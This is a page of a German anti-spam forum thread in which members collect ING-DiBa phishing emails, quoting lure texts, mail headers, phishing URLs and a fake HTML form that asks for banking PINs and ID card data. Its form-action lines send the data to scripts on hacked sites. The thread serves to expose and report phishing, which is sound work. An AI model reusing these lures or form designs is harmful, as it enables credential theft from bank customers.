Seite 2 von 5 ErsteErste 1234 ... LetzteLetzte
Ergebnis 11 bis 20 von 48

Thema: ING-DiBa Phishing

  1. #11
    Mitglied Avatar von madman70
    Registriert seit
    09.05.2012
    Ort
    Filderstadt
    Beiträge
    108

    Standard ING-DiBa Sicherheitsmitteilung

    Und schon wieder Ing DiBa - diesmal sogar mit Text in der Mail

    Guten Tag, <richtiger Name von madman70>!

    am 18.12.2014 wurden verschiedene Server-Updates durchgeführt, welche zwischen 03:00 und 05:00 Uhr stattfanden. In diesem Zeitraum waren unsere Server für Sie leider nicht erreichbar, dafür entschuldigen wir uns bei Ihnen.

    Nach der Systemaktualisierung wurden auf Ihrem Konto Unregelmäßigkeiten bezüglich der Aktualität Ihrer Daten festgestellt. Daher bitten wir Sie, Ihre Daten nochmals zu verifizieren und damit Ihr Konto zu reaktivieren.

    Aktualisierung ausführenwhois:http://lng-ssl-service.com/ing-diba-sicherheit/ssl-gateway/ssl-gateway/0/<ID entfernt>==/ing-diba-sicherheit.html

    Bitte beachten Sie, dass Ihr Kontozugang so lange eingeschränkt bleibt, bis Sie Ihre Identität bestätigt haben. Vielen Dank für Ihr Verständnis.


    Mit freundlichen Grüßen

    G*** F***
    Leiterin Kundendialog
    Hier der Header:


    header:
    01: Return-Path: root [at] j116932.servers.jiffybox.net
    02: Received: from j116932.servers.jiffybox.net ([134.119.17.137]) by mx-ha.web.de
    03: (mxweb103) with ESMTPS (Nemesis) ID: [ID filtered]
    04: <xxxxx [at] web.de>; Sat, 20 Dec 2014 xx:xx:xx +0100
    05: Received: from j116932.servers.jiffybox.net (localhost [127.0.0.1])
    06: by j116932.servers.jiffybox.net (8.14.4/8.14.4) with ESMTP ID: [ID filtered]
    07: for <poor [at] spamvictim.tld>; Sat, 20 Dec 2014 xx:xx:xx +0100
    08: Received: (from root [at] localhost)
    09: by j116932.servers.jiffybox.net (8.14.4/8.14.4/Submit) ID: [ID filtered]
    10: Sat, 20 Dec 2014 xx:xx:xx +0100
    11: Date: Sat, 20 Dec 2014 xx:xx:xx +0100
    12: Message-ID: [ID filtered]

    Meldung an abuse@jiffybox.net ist raus (Betreiber der "Jiffybox"-Cloud, siehe Absender)...

    Grüße, madman70
    Geändert von Mittwoch (20.12.2014 um 19:48 Uhr) Grund: Zitat repariert, anonymisiert

  2. #12
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    9.063

    Standard

    Auch hier wieder der Ganove mit dem HTML-Formular im Anhang:


    header:
    01: Received: from mail.hscseminars.org ([66.166.140.195]) by mx-ha.gmx.net
    02: (mxgmx113) with ESMTP (Nemesis) ID: [ID filtered]
    03: Received: from localhost (localhost.localdomain [127.0.0.1]) by
    04: mail.hscseminars.org (Postfix) with ESMTP ID: [ID filtered]
    05: Received: from mail.hscseminars.org ([127.0.0.1]) by localhost
    06: (mail.hscseminars.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP ID: [ID
    07: filtered]
    08: Received: from dnd-gns.de (stats.enterx.arvixevps.com [192.169.55.49]) by
    09: mail.hscseminars.org (Postfix) with ESMTPA ID: [ID filtered]

    Datenabgleich/Aktualisierung
    Unser Tipp: Jetzt Online ausfüllen und Gebühren sparen!
    Mit freundlichen Grüßen
    Ihre Ing Diba

    Guten Tag,

    Unser System hat festgestellt, dass Ihre bei uns hinterlegten Daten aus
    Sicherheitsgründen bestätigt werden müssen.

    Bitte benutzen Sie dieses Formular um die bestätigung Ihrer Daten
    kostenfrei zu
    ändern.

    Andernfalls müssen wir Ihr Konto mit 14,99€ belasten und die Änderung
    schriftlich über den Postweg bei Ihnen einfordern.

    Bitte laden und öffnen Sie das Sicherheitszertifikat angebracht und
    folgen Sie
    den Anweisungen oder wie folgt ausführen:

    1. Öffnen Sie die Datei in Ihrem Emailanhang und wählen Sie "öffnen mit"
    aus!
    2. Füllen Sie alle Daten aus und klicken Sie dann auf "Daten absenden"!
    3. Eine kostenfreie bestätigung erhalten Sie schriftlich nach 5-7 Werktagen!

    Für weitere Fragen steht unser Online Support unter direkt@ing-diba.de
    24Std.
    für Sie zur Verfügung.
    Skript auf gecracktem Server:

    [HTML]<form action="http://tapcure.com/beta/images/x/mail.php" method="post">[/HTML]

    IP: 208.91.199.150 ---> bh-7.webhostbox.net
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  3. #13
    Diplom Privatier (c) Avatar von cmds
    Registriert seit
    04.05.2006
    Ort
    N 53° 07.274′ E 7° 58.678′
    Beiträge
    12.757

    Standard

    Wieder eine Kerbe mehr auf meinem Scoreboard

    Thank you from Netcraft
    The URL you recently submitted has been accepted as a phishing site by
    Netcraft.

    URL:
    whois:http://tapcure.com/beta/images/x/mail.php
    As of 1st December 2014, the Netcraft Toolbar community has blocked over
    6 million phishing attacks
    Die Signatur befindet sich aus technischen Gründen auf der Rückseite dieses Beitrages!
    Dieser Eintrag wurde extrem umweltfreundlich, aus wiederverwendeten Buchstaben gelöschter E-Mails geschrieben und ist vollständig digital abbaubar.
    „Ich fürchte den Tag, wenn Technologie unsere Wechselbeziehungen beeinflusst, die Welt wird Generationen von Idioten haben.” Albert Einstein 1879-1955
    „Die ältesten Wörter sind die besten und die kurzen die allerbesten." Sir Winston Churchill 1874–1965
    "Nur die Lüge braucht die Stütze der Staatsgewalt, die Wahrheit steht von alleine aufrecht."Thomas Jefferson1743-1826




  4. #14
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    9.063

    Standard

    Und wieder der Phishki mit dem HTML-Anhang und gecracktem Wordpress:


    header:
    01: Received: from tccs2.tantalos.de ([86.109.249.181]) by mx-ha.gmx.net
    02: (mxgmx009) with ESMTP (Nemesis) ID: [ID filtered]
    03: Mon, 05 Jan 2015 xx:xx:xx +0100
    04: Received: from localhost (localhost [127.0.0.1])
    05: by tccs2.tantalos.de (Postfix) with ESMTP ID: [ID filtered]
    06: for xxxxx; Sun, 4 Jan 2015 xx:xx:xx +0100 (CET)
    07: Received: from tccs2.tantalos.de ([127.0.0.1])
    08: by localhost (tccs2.tantalos.de [127.0.0.1]) (amavisd-new, port 10024)
    09: with ESMTP ID: [ID filtered]
    10: Sun, 4 Jan 2015 xx:xx:xx +0100 (CET)
    11: Received: from deeba.de (cfbenter.arvixevps.com [108.175.152.16])
    12: by tccs2.tantalos.de (Postfix) with ESMTPA ID: [ID filtered]
    13: for xxxxx; Sun, 4 Jan 2015 xx:xx:xx +0100 (CET)

    Datenabgleich/Aktualisierung
    Unser Tipp: Jetzt Online ausfüllen und Gebühren sparen!
    Mit freundlichen Grüßen
    Ihre Ing Diba

    Guten Tag,

    Unser System hat festgestellt, dass Ihre bei uns hinterlegten Daten aus
    Sicherheitsgründen bestätigt werden müssen.

    Bitte benutzen Sie dieses Formular um die bestätigung Ihrer Daten
    kostenfrei zu
    ändern.

    Andernfalls müssen wir Ihr Konto mit 14,99€ belasten und die Änderung
    schriftlich über den Postweg bei Ihnen einfordern.

    Bitte laden und öffnen Sie das Sicherheitszertifikat angebracht und
    folgen Sie
    den Anweisungen oder wie folgt ausführen:

    1. Öffnen Sie die Datei in Ihrem Emailanhang und wählen Sie "öffnen mit"
    aus!
    2. Füllen Sie alle Daten aus und klicken Sie dann auf "Daten absenden"!
    3. Eine kostenfreie bestätigung erhalten Sie schriftlich nach 5-7 Werktagen!

    Für weitere Fragen steht unser Online Support unter direkt@ing-diba.de
    24Std.
    für Sie zur Verfügung.


    Data.htm

    Aktualisierung Ihre Telefon-Banking PIN




    Kontonummer / Depotnummer:

    Internetbanking PIN:

    ING-DiBa Key (6-stelligen):

    Geburtsdatum (TT.MM.JJJJ):

    Personalausweisnummer:

    Ausstellungsdatum Personalausweis:

    Geburtsort:

    Telefon Banking Pin (5-stelligen):

    Verifizieren
    Phishing Skript:

    [HTML]<form action="http://chlorideexide.com/wp-includes/images/smilies/x/mail.php" method="post">[/HTML]

    IP: 216.70.68.111 ---> dotsavvycloud.com/Mediatemple
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  5. #15
    Medien- & Kaffeeguru Avatar von truelife
    Registriert seit
    28.01.2006
    Ort
    Vals (Graubünden)
    Beiträge
    18.697

    Standard

    Was mich jedesmal wundert: Wieso kann man aus dem Quelltext nicht erkennen, wohin die gephishten Daten versandt /gespeichert werden?
    "Eine Rose wird auch im Himmel noch ein Rose sein, aber sie wird zehnmal süßer duften." - Luisa † 26.10.2009
    Spende an Antispam / Hilfe für Neulinge / Forenregeln / Nettiquette / Das Antispam - Lexikon / Werden Sie Mitglied
    "Das Internet ist für uns alle Neuland." - Bundeskanzlerin Angela Merkel (19.06.2013)
    smayer@public-files.de smayer@fantasymail.de

  6. #16
    Mittwoch
    Gast

    Standard

    Zitat Zitat von truelife Beitrag anzeigen
    Was mich jedesmal wundert: Wieso kann man aus dem Quelltext nicht erkennen, wohin die gephishten Daten versandt /gespeichert werden?
    offtopic:
    Weil das PHP-Skript, das aufgerufen wird, um die Daten zu verschicken, als aktive Sprache auf dem Webserver ausgeführt wird, auf dem man als normaler Internetnutzer nicht die nötigen Zugriffsrechte hat. Der Webserver liefert als Ergebnis des Skriptlaufs nur "normales" HTML aus, und das hat mit dem Mailversand nichts zu tun, der über andere Kanäle läuft.

    Beispiel Datenbankabfrage: Im PHP-Skript benutze ich einige Befehle, die der Webserver als Datenbankserver ausführt (oder entsprechend weitergibt, je nach Konfiguration) und die die Datenbank abfragen. Das Ergebnis dieser Abfrage wird dann von PHP abgefangen und zu in einen HTML-Quelltext eingebaut, der wiederum dann als Webseite an den Webserver übergeben und dem Aufrufenden ausgeliefert wird. Um an Daten aus der Datenbank zu kommen, muss ich somit also weder Kenntnisse über die Struktur derselben haben noch direkten Zugang zu ihr. PHP überbrückt die Lücke und schottet den Zugang auch nach außen ab.

    PHP verhält sich dabei in etwa so wie Sprecher von Gerichten. Wenn sie von Journalisten zu einem Verfahren gefragt werden, holen sie sich zunächst umfangreiche Auskünfte bei den zuständigen Kammern, wägen dann ab, was davon an die Öffentlichkeit darf und schweigen sich über den Rest beharrlich aus. Ohne spezielle Druckmittel (ich meine Hacks eines PHP-Servers) kommt man nicht an solche Informationen. Und bei den Kammern (=Diensten auf dem Server) selber kann man zwar direkt anfragen, erhält aber ohne passende Berechtigung (=Zugangsdaten) eine Abfuhr.

    Schönen offtopic-Gruß
    Mittwoch

  7. #17
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    9.533

    Standard

    whois:http://shiftwithtory.com/wp-includes/images/smilies/x/mail.php hätte ich auch noch im Angebot.
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  8. #18
    Diplom Privatier (c) Avatar von cmds
    Registriert seit
    04.05.2006
    Ort
    N 53° 07.274′ E 7° 58.678′
    Beiträge
    12.757

    Standard

    Zitat Zitat von schara56 Beitrag anzeigen
    whois:http://shiftwithtory.com/wp-includes/images/smilies/x/mail.php hätte ich auch noch im Angebot.
    scheint schon enttarnt/korrigiert worden zu sein, bei mir in der Sandbox kommt da die Echte https://www.ing-diba.de/ Seite

    (bei dem kompletten Link natürlich)

    der abgekürzte Link bringt sofort eine Phishing Warnung
    Die Signatur befindet sich aus technischen Gründen auf der Rückseite dieses Beitrages!
    Dieser Eintrag wurde extrem umweltfreundlich, aus wiederverwendeten Buchstaben gelöschter E-Mails geschrieben und ist vollständig digital abbaubar.
    „Ich fürchte den Tag, wenn Technologie unsere Wechselbeziehungen beeinflusst, die Welt wird Generationen von Idioten haben.” Albert Einstein 1879-1955
    „Die ältesten Wörter sind die besten und die kurzen die allerbesten." Sir Winston Churchill 1874–1965
    "Nur die Lüge braucht die Stütze der Staatsgewalt, die Wahrheit steht von alleine aufrecht."Thomas Jefferson1743-1826




  9. #19
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    9.063

    Standard

    Wobei dieser Ganove am Ende des Skripts immer eine Weiterleitung zur Original Bankseite einbaut. Die Daten werden also abgegriffen und dann erfolgt zur Verschleierung die Weiterleitung zur Original Website. Gemeinsam ist diesen gecrackten Wordpress-Installationen meist auch, dass da bei den Servern der Hosenlatz offensteht. Wobei es im Darkweb natürlich auch alles zu kaufen gibt: gecrackte Server, Phishing-Kits mit Bankauswahl für Dumm-Phiskis, etc.

    Und bei PHP ist es ja so, dass der Server solche Skipte gemeinhin ausführt. Könnte man diese einfach nur herunterladen, so wäre evtl. auch das Ziel des Datenversands erkennbar. Aber so blöd sind die russ. Cyberkriminellen natürlich auch wieder nicht, es sind ja keine Mugus.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  10. #20
    Medien- & Kaffeeguru Avatar von truelife
    Registriert seit
    28.01.2006
    Ort
    Vals (Graubünden)
    Beiträge
    18.697

    Standard

    Nun, über einen Umweg bekommt man in Windows ja das Script runtergeladen. Man erstellt dazu eine Verknüpfung zu der *.php-Datei auf dem gecrakten Server, benennt die Dateierweiterung hernach in *.txt um und öffnet das dann mit dem Editor oder Wordpad. Und das ergibt bei mir nur und ausschließlich den 1:1 Quelltext der INGDiBa.
    "Eine Rose wird auch im Himmel noch ein Rose sein, aber sie wird zehnmal süßer duften." - Luisa † 26.10.2009
    Spende an Antispam / Hilfe für Neulinge / Forenregeln / Nettiquette / Das Antispam - Lexikon / Werden Sie Mitglied
    "Das Internet ist für uns alle Neuland." - Bundeskanzlerin Angela Merkel (19.06.2013)
    smayer@public-files.de smayer@fantasymail.de

Seite 2 von 5 ErsteErste 1234 ... LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen